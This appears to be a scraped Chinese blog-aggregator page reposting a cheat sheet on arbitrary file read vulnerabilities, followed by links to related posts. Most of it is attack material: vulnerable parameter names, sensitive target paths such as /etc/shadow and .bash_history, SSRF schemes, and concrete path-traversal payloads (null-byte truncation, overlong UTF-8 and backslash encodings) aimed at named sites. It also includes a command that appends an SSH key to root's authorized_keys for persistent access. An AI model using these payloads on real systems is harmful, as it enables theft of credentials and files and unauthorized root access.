2. 程式人生 > >任意文件讀取

任意文件讀取

阿新 發佈:2018-02-14
config tracking ont sed views ack passwd enc pro

轉自http://blog.csdn.net/cd_xuyue/article/details/50560259

敏感字段

&RealPath=
&FilePath=
&filepath=
&Path=
&path=
&inputFile=
&url=
&urls=
&Lang=
&dis=
&data=
&readfile=
&filep=
&src=
&menu=
META-INF
WEB-INF
  • 1
  • 2
  • 3
  • 4
  • 5
  • 6
  • 7
  • 8
  • 9
  • 10
  • 11
  • 12
  • 13
  • 14
  • 15
  • 16
  • 17

可利用路徑

/etc/shadow
/etc/passwd
/etc/hosts
/root/.bash_history 找user add,cd,mysql,ssh,nohop看敏感目錄和文件等
/etc/syscomfig/network-scripts/ifcfg-eth1
sed -i ‘/95_251/d’ /root/.ssh/authorized_keys
url=file:///etc/passwd
url=http://10.29.5.24(ssrf內網探測)
/opt/nginx/conf/nginx.conf
file:///,gopher://,ftp://
/configs/database.php

Payload

  1. http://...:8080/%c0%ae/WEB-INF/classes/com/huilan/application/action/PeopleBankAction.class

  2. 配合截斷規則:/etc/passwd%00.jpg

  3. ../../../../../../../../../../etc/passwd%00.jpg

  4. http://www.zzvcom.com/cms/interface.jsp?time=41&data={readfile:%27/WEB-INF/classes/jdbc.properties%27}&jsoncallback=jsonp1442909681355

  5. http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

  6. http://www.intime.com.cn:8000/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini

  7. echo ssh-rsa
    AAAAB3NzaC1yc2EAAAABIwAAAQEA0jrJeJfEURdpG/jddXzk3zZYxQfdHbgPC4QYh5qx0F2SS1Q+uCW6j2cM/SxqhocfgDYw1CTikNTlJ43tzv1ozpSRjmLH26aTxGDUnXsvyVLeWdrjPni1FoVffW+LM0rZVh7A74Vi1bDr7IP7XjSMQU157rye7++G+eWA1NhscIiiJ/pwUKAjPSiEx+8DXN8ccTDyWrSnD+NfUQXPO4dVFu2MR5/VjLO2yWsVMwenCPwItf5xEwGqU5KbzxeTOyDnYYLk7UF6lBYpSDZC9U3mNL1alYgNnIbmZGYg921KFh28BRptDewh5MRDKmfMUSqeZpIZ95Pq8lG1sObcjNzDew== root@szmlserver95_251.easou.com >> /root/.ssh/authorized_keys

任意文件讀取

相關推薦

glassfish任意讀取漏洞解析

glass pat them res unicode編碼 load ble ets 過濾 一、背景: glassfish是一款java編寫的跨平臺的開源的應用服務器。 二、漏洞原理: 與寬字節SQL註入一致,都是由於unicode編碼歧義導致的。具體payload如下構造:

PHPMailer命令執行及任意讀取漏洞

custom orm cga -s tails 文件 ack exp else   今天在thinkphp官網閑逛,無意下載了一套eduaskcms,查看了一下libs目錄中居然存在PHPMailer-5.2.13,想起了之前看到的PHPMailer的漏洞,可惜這套CMS只

任意讀取

config tracking ont sed views ack passwd enc pro 轉自http://blog.csdn.net/cd_xuyue/article/details/50560259 敏感字段 &RealPath= &

【代碼審計】兩個任意讀取漏洞實例

狀態 內容 cfg 必須 名稱 ror div 完整 FN 0x00 前言 0x01 漏洞實例一 環境搭建: XYHCMS官網:http://www.xyhcms.com/ 網站源碼版本:XYHCMS V3.5(2017-12-04 更新) 程序源碼下載:https:

feifeicms後臺任意讀取

spa class oca action 基本上 直接 aac png icm 前臺大略看了下,本身內容比較簡單,經過“洗禮”後以及沒什麽問題了,基本上輸入都過濾了。 這次審計找到了一個後臺的任意文件讀取,可以讀取數據庫配置文件。 在DataAction.clas

讀取草稿(excel,csv)

string guid dwr lda clas isn urn datarow arraylist using NPOI.XSSF.UserModel; using System; using System.Collections.Generic; using Syst

java讀取與寫入

文件 public color exc cnblogs 循環 pack delet 根據 package com.myjava; import java.io.*; import java.util.ArrayList; import java.util.Collect

java實現xml讀取並保存到對象

數據封裝 itl imp get return 配置文件 targe dom4j xml配置 首先淺聊一下解析xml的四種方式: 1.DOM方式:有缺點但是這個缺點卻也是他的優點。下面詳細介紹:

【U1結業機試題】新聞內容管理系統:解析XML讀取Html模版生成網頁

repl att not 一個 class 新的 create hashmap exception 一、作業要求: 1.在xml文件中創建新聞節點news,包含標題、作者、日期、正文等信息 2.創建HTML模板文件 3.讀取xml中所有新聞信息,並使用新聞信息替換模板文件中

nj10---讀取

-- 沒有 數據 mode 案例 ejs func 所有 地址 介紹:fs模塊是文件操作的封裝,它提供了文件的讀取,寫入,更名,刪除,遍歷目錄,鏈接POSIX文件系統操作。與其他模塊不同的是,fs模塊中所有的操作都提供了異步和同步兩個版本,例如讀取文件內容函數異步方法:r

RootFramework框架實現讀取和上傳以及使用JavaScript獲取fields中的值

roo 讀取 frame get .get 轉換 script 輸入 tor 1、項目中使用的相對路徑需要轉換成絕對路徑,(Python方法實現 os.path.abspath(‘path‘)) 2、choose file [locators,file_pat

本地讀取(csv,txt)時字符編碼問題解決

red eve utf-8 中文字符 有著 生產 light 用戶 讀取   今天進行csv文件讀取時,老是入庫為空,因為其中有中文字符,我要通過中文字符映射成相應的編號(上升:1011,下降:1012),於是怎麽也取不到編號.剛開始以為程序映射出了問題,最後日誌打出來後,

C#-XML提取字符串+字符串存為XML+創建XML(自定義節點)+讀取節點內容

cts ted set clas desc format view nav child 一、將字符串寫入xml文件(並保存) 寫入: XmlDocument xdoc = new XmlDocument(); xdoc.LoadXml(“xmlstring”); 保存

Head First Python 學習筆記-Chapter3:讀取和異常處理

獲取 for循環 文件 處理 pyhton find ont ren app 第三章中主要介紹了簡單的文件讀取和簡單的異常處理操作。 首先建立文件文件夾:HeadFirstPython\chapter3,在Head First Pythong官方站

SpringBoot上傳任意功能的實現

turn span ise created recursive .get on() pro equal 一、pom文件依賴的添加 <dependencies> <dependency> <groupI

monxin cms 任意刪除漏洞

str date 發現 漏洞 conf cti 問題 var_dump ray \program\diypage\receive\edit.php首先看到一個unlink($path);本來應該先看sql語句的,但知道是任意文件刪除先跳過刪除語句,看看$path怎麽傳入的倒

DocCms存儲型XSS+後臺任意下載上傳+目錄刪除+sql執行(有條件可getshell)

htaccess upload original title ann star logs lec ssp 下載鏈接 https://share.weiyun.com/46ebceb4fe91da144ad2661522a941e1 留言處存儲型XSS 漏洞在content/

字典讀取

note readline isn logs 文件讀取 fin == clas exception /** * 詞工具 * */ public class WordUtil { private final static Logger logger = Log

Java中IO流讀取、寫入和復制

復制 循環 int files catch class close brush system //構造文件File類 File f=new File(fileName); //判斷是否為目錄 f.isDirectory(); //獲取目錄下的文件名 String[] fil

采用OleDB讀取EXCEL 讀取數字後,字符串無法讀取

tex i++ eem pty col ++ lena ons blog   很多人采用OleDB讀取EXCEL文件的時候會發現,當一列數據以數字開頭的時候,後面的字符串無法讀取,今天就給大家分享一下解決此問題的小竅門。   1、把列標題當做數據來讀取(HDR=NO設置把第